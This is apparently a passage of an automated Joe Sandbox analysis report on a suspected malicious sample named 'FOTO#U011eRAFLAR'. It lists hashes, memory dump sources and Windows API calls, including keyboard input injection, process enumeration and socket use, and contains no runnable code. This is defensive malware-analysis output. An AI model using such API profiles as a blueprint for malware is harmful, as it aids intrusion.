                                                                      • Opcode ID: 3ea2433540cf3672089df32a1336f693e27f01453a16ec18aca08d749819a8c1
                                                                      • Instruction ID: 053d44bb9490169bfbbdde5b8cdd048fb7f690046ad1fcf415166b5b2ff61980
                                                                      • Opcode Fuzzy Hash: 3ea2433540cf3672089df32a1336f693e27f01453a16ec18aca08d749819a8c1
                                                                      • Instruction Fuzzy Hash: EA11A2716002456BCF11BF709C85AFE776AEF95314F04806AF90D9A292EE3099499B70
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DA57F6
                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DA5823
                                                                      • DrawMenuBar.USER32(?), ref: 00DA5832
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$InfoItem$Draw
                                                                      • String ID: 0
                                                                      • API String ID: 3227129158-4108050209
                                                                      • Opcode ID: d7da0c5a85910336020bd6ceb8791c7a8d86a3677ab39902c94d07f5db5a04b8
                                                                      • Instruction ID: a13dea5ee5ad4281f159ad73d423ff2a935b95c33cca065873bbba0810493c9c
                                                                      • Opcode Fuzzy Hash: d7da0c5a85910336020bd6ceb8791c7a8d86a3677ab39902c94d07f5db5a04b8
                                                                      • Instruction Fuzzy Hash: 49019231900318EFDB119F60EC44BAA7BB4FF46364F1480A9F849D6250DB349984EF31
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                      • String ID:
                                                                      • API String ID: 1998397398-0
                                                                      • Opcode ID: 24031874814216d35855a7fc6746abd1593961fb4e63a3c9647861c7fecda891
                                                                      • Instruction ID: fcf67749a6a285f17873a58b1cdc7524b74dfd8bac6f1c16caeb97f6ef73f3a4
                                                                      • Opcode Fuzzy Hash: 24031874814216d35855a7fc6746abd1593961fb4e63a3c9647861c7fecda891
                                                                      • Instruction Fuzzy Hash: 1DA13975604310AFCB00DF24D485A6ABBE5FF89714F098859F9899B362CB71ED41CB72
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00DAFC24,?), ref: 00D704D9
                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00DAFC24,?), ref: 00D704F1
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00DAD108,000000FF,?,00000000,00000800,00000000,?,00DAFC24,?), ref: 00D70516
                                                                      • _memcmp.LIBVCRUNTIME ref: 00D70537
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID:
                                                                      • API String ID: 314563124-0
                                                                      • Opcode ID: f9205b272922c25ce295cf57dc0b410a1e60e56b900e512d3e1700b009ea6779
                                                                      • Instruction ID: 099047c99c2b2293e2ec8b3fc3f313cf24b070169c50a85d85a81fcbc5f68e80
                                                                      • Opcode Fuzzy Hash: f9205b272922c25ce295cf57dc0b410a1e60e56b900e512d3e1700b009ea6779
                                                                      • Instruction Fuzzy Hash: 7981FA71A00109EFCB04DF94C984EEEBBB9FF89315F248559E506AB250DB71AE45CF60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 6711c71d85470746e67b22683e8d34b45a5c9aaad541b9bb68565570b9a99fd1
                                                                      • Instruction ID: b59a56292ffb8e386f9c6d446e966996cb16e77f1c5b5ebb4edcd2fb374e653a
                                                                      • Opcode Fuzzy Hash: 6711c71d85470746e67b22683e8d34b45a5c9aaad541b9bb68565570b9a99fd1
                                                                      • Instruction Fuzzy Hash: 16417D3EA00604ABEF206FFE8C85B7F7AA4FF41771F184225FC18C6291DA7488498671
                                                                      APIs
                                                                      • GetWindowRect.USER32(00EDEB88,?), ref: 00DA61B0
                                                                      • ScreenToClient.USER32(?,?), ref: 00DA61E3
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DA6250
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: ccb20b878b7c64ad23f2deeefc5c741f4c756433be033c4b9cd438e0aae5b2db
                                                                      • Instruction ID: 5cf3726b6296e21a829f20029f2119943f9e03798246cd38da6d9d34223d9012
                                                                      • Opcode Fuzzy Hash: ccb20b878b7c64ad23f2deeefc5c741f4c756433be033c4b9cd438e0aae5b2db
                                                                      • Instruction Fuzzy Hash: 10513B75A00209EFCF11DF64D880AAE7BB6FF56360F188159F9659B291D730ED81CBA0
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00D91A24
                                                                      • WSAGetLastError.WSOCK32 ref: 00D91A32
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00D91AB1
                                                                      • WSAGetLastError.WSOCK32 ref: 00D91ABB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$socket
                                                                      • String ID:
                                                                      • API String ID: 1881357543-0
                                                                      • Opcode ID: a541d717b7cd0ef824de39c3f2386bdafae6f39a020cbebdf789e50c929b9071
                                                                      • Instruction ID: 2c087e5488ecd408735a226c1d1e286e08ccea7312887a10e0b2e8329bfe4f15
                                                                      • Opcode Fuzzy Hash: a541d717b7cd0ef824de39c3f2386bdafae6f39a020cbebdf789e50c929b9071
                                                                      • Instruction Fuzzy Hash: 4341A338600301AFDB20AF24D886F6677A5EF54718F58C458F9198F3D2DA72DD828BB0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f7a0f5bcb04e9790bf89de1b871ec9c86e016e995caa051fe0f32d58db5ffb1
                                                                      • Instruction ID: 0553f9a82b5c79359874341faf13232aef98dde008bf441f5357d7e364dff8c2
                                                                      • Opcode Fuzzy Hash: 6f7a0f5bcb04e9790bf89de1b871ec9c86e016e995caa051fe0f32d58db5ffb1
                                                                      • Instruction Fuzzy Hash: 40412975A00314AFD7249F78CC41BAABBE9EB98720F10452BF545DB281D7B1E90187B0
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00D856A1
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00D856C7
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00D856EC
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00D85718
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: 84dc771869814edbf38213fdd986091e98db3eada980378f08ffcba06923e4c9
                                                                      • Instruction ID: cf13bd05159be7f50705194b6797d6b4eb3f397909a30f5a549a630850d2c96a
                                                                      • Opcode Fuzzy Hash: 84dc771869814edbf38213fdd986091e98db3eada980378f08ffcba06923e4c9
                                                                      • Instruction Fuzzy Hash: 0F413B35600610EFCB10EF15D445A99BBE2EF89720B588488F94A9B362CF71FD41DBB1
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D36D01,00000000,00000000,00D38269,?,00D38269,?,00000001,00D36D01,8BE85006,00000001,00D38269,00D38269), ref: 00D4D8B0
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D4D939
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D4D94B
                                                                      • __freea.LIBCMT ref: 00D4D954
                                                                        • Part of subcall function 00D437B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D2FD75,?,?,00D1B63D,00000000,?,?,?,00D8106C,00DAD0D0,?,00D5242E), ref: 00D437E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                      • String ID:
                                                                      • API String ID: 2652629310-0
                                                                      • Opcode ID: 2258c3e2299818d7005fbe702e94ceb8b5b95e403d791ab084c9cc574153dfce
                                                                      • Instruction ID: bb1c5dd3806226d3152c72424388a6c2489f59b3ffb52e06d867858256b72d3c
                                                                      • Opcode Fuzzy Hash: 2258c3e2299818d7005fbe702e94ceb8b5b95e403d791ab084c9cc574153dfce
                                                                      • Instruction Fuzzy Hash: 4C31CD72A0020AABDF258F64DC55EAE7BA6EF45710F084168FC18D7250EB35DD50CBB0
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00DA5287
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA52AA
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DA52B7
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DA52DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                      • String ID:
                                                                      • API String ID: 3340791633-0
                                                                      • Opcode ID: 2d4ba7d5f271fa85e6956723b3e25c53e847d6a9daff423ce8ad4d2e85b59c20
                                                                      • Instruction ID: 787885367e92ade6df303d6cde05a23e2c9461d5cdfe6aef1b289ef1746704e6
                                                                      • Opcode Fuzzy Hash: 2d4ba7d5f271fa85e6956723b3e25c53e847d6a9daff423ce8ad4d2e85b59c20
                                                                      • Instruction Fuzzy Hash: F131E134A51A08BFEF309F14EC46BE83761AB47350F5C4102FA12962E5C374A940DB79
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00D7AB0F
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00D7AB2B
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00D7AB92
                                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00D7ABE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 6a6b42fdacd409e104795b7e08c26e26f886350fac53d5960088d42ebcdbdbe9
                                                                      • Instruction ID: 0d200a0faddc1c6ea8f4ce107e09be7e0ef0119b244774ad486e69920e006625
                                                                      • Opcode Fuzzy Hash: 6a6b42fdacd409e104795b7e08c26e26f886350fac53d5960088d42ebcdbdbe9
                                                                      • Instruction Fuzzy Hash: 3931EA30940318AEEF358A6CC815BFE7B66ABC5320F08C21EE499961D1E379895587B3
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 00DA7569
                                                                      • GetWindowRect.USER32(?,?), ref: 00DA75DF
                                                                      • PtInRect.USER32(?,?,00DA8A7B), ref: 00DA75EF
                                                                      • MessageBeep.USER32(00000000), ref: 00DA765B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: a57a5f9092f1d5c4af372aa75951abb520dc80283345fc9831695b6cf5dd5ec7
                                                                      • Instruction ID: 5cc0b7e82c03e07bbd9050b2d9fa931e2e3dae5c75d0c1283f0f3fb1e824ce4f
                                                                      • Opcode Fuzzy Hash: a57a5f9092f1d5c4af372aa75951abb520dc80283345fc9831695b6cf5dd5ec7
                                                                      • Instruction Fuzzy Hash: B1415434A086159FCB41DF58DC94BA9BBF6BB5A310F1D41A9E824DB362C731E941CFA0
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00DA161E
                                                                        • Part of subcall function 00D73985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7399F
                                                                        • Part of subcall function 00D73985: GetCurrentThreadId.KERNEL32 ref: 00D739A6
                                                                        • Part of subcall function 00D73985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D724F7), ref: 00D739AD
                                                                      • GetCaretPos.USER32(?), ref: 00DA1632
                                                                      • ClientToScreen.USER32(00000000,?), ref: 00DA167F
                                                                      • GetForegroundWindow.USER32 ref: 00DA1685
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: 9c85ef0e90a9acd30d539976329d103fd7d6615d7df8bea657d61d276ba47533
                                                                      • Instruction ID: 4c2197a310f2e33cfc42c4f0d9fbac13c2b4e309037d3ba766eb630f286ec0dc
                                                                      • Opcode Fuzzy Hash: 9c85ef0e90a9acd30d539976329d103fd7d6615d7df8bea657d61d276ba47533
                                                                      • Instruction Fuzzy Hash: FF312F75D10209AFC704EFA9D8818EEBBFCEF89304B54806AE415E7211DB319E45CBB0
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00D7D41F
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00D7D42D
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00D7D44D
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D7D4FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: 819b0979f231e30e6981e775c1b96c0df38a350844de8272262cbd3967bdc3ba
                                                                      • Instruction ID: 2b062c6e618119fd87b99c07f779a2d10f9d49f413d41573e8e9e0167f277f07
                                                                      • Opcode Fuzzy Hash: 819b0979f231e30e6981e775c1b96c0df38a350844de8272262cbd3967bdc3ba
                                                                      • Instruction Fuzzy Hash: 5C318231108300AFD311EF54D885AAFBBF9EF99354F04452DF585861A1EF71A989CBB2
                                                                      APIs
                                                                        • Part of subcall function 00D2B021: GetWindowLongW.USER32(?,000000EB), ref: 00D2B032
                                                                      • GetCursorPos.USER32(?), ref: 00DA8EF3
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D680CE,?,?,?,?,?), ref: 00DA8F08
                                                                      • GetCursorPos.USER32(?), ref: 00DA8F50
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D680CE,?,?,?), ref: 00DA8F86
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: fcf78fb99d020380e4b410121dfa1ad3dd2ef9d6da0cd7a9c74c61f91ae57d12
                                                                      • Instruction ID: 636233082435cd956335104006b8802736ee6abc61552f46dfad62e22d8fa005
                                                                      • Opcode Fuzzy Hash: fcf78fb99d020380e4b410121dfa1ad3dd2ef9d6da0cd7a9c74c61f91ae57d12
                                                                      • Instruction Fuzzy Hash: 5721BF35A00118EFDB258F54CC98EEA7BB6EF4A320F084155F9068B2A1C7319991EB70
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00DAD034), ref: 00D7D219
                                                                      • GetLastError.KERNEL32 ref: 00D7D228
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D7D237
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DAD034), ref: 00D7D294
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: 4b0ae74cc3a946e0ba42d8003f2a81a3885c5d4952cdec87cb27f04c21e30c36
                                                                      • Instruction ID: 00577db6d07ffa18b49ec95ff488e8b70a0c45b7156fd155b74f93105f01a19b
                                                                      • Opcode Fuzzy Hash: 4b0ae74cc3a946e0ba42d8003f2a81a3885c5d4952cdec87cb27f04c21e30c36
                                                                      • Instruction Fuzzy Hash: E22132705093019F8710DF24D88159A77F5EF56364F14861DF499C72A2EB30DD4ACBB6
                                                                      APIs
                                                                        • Part of subcall function 00D70F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D70F6E
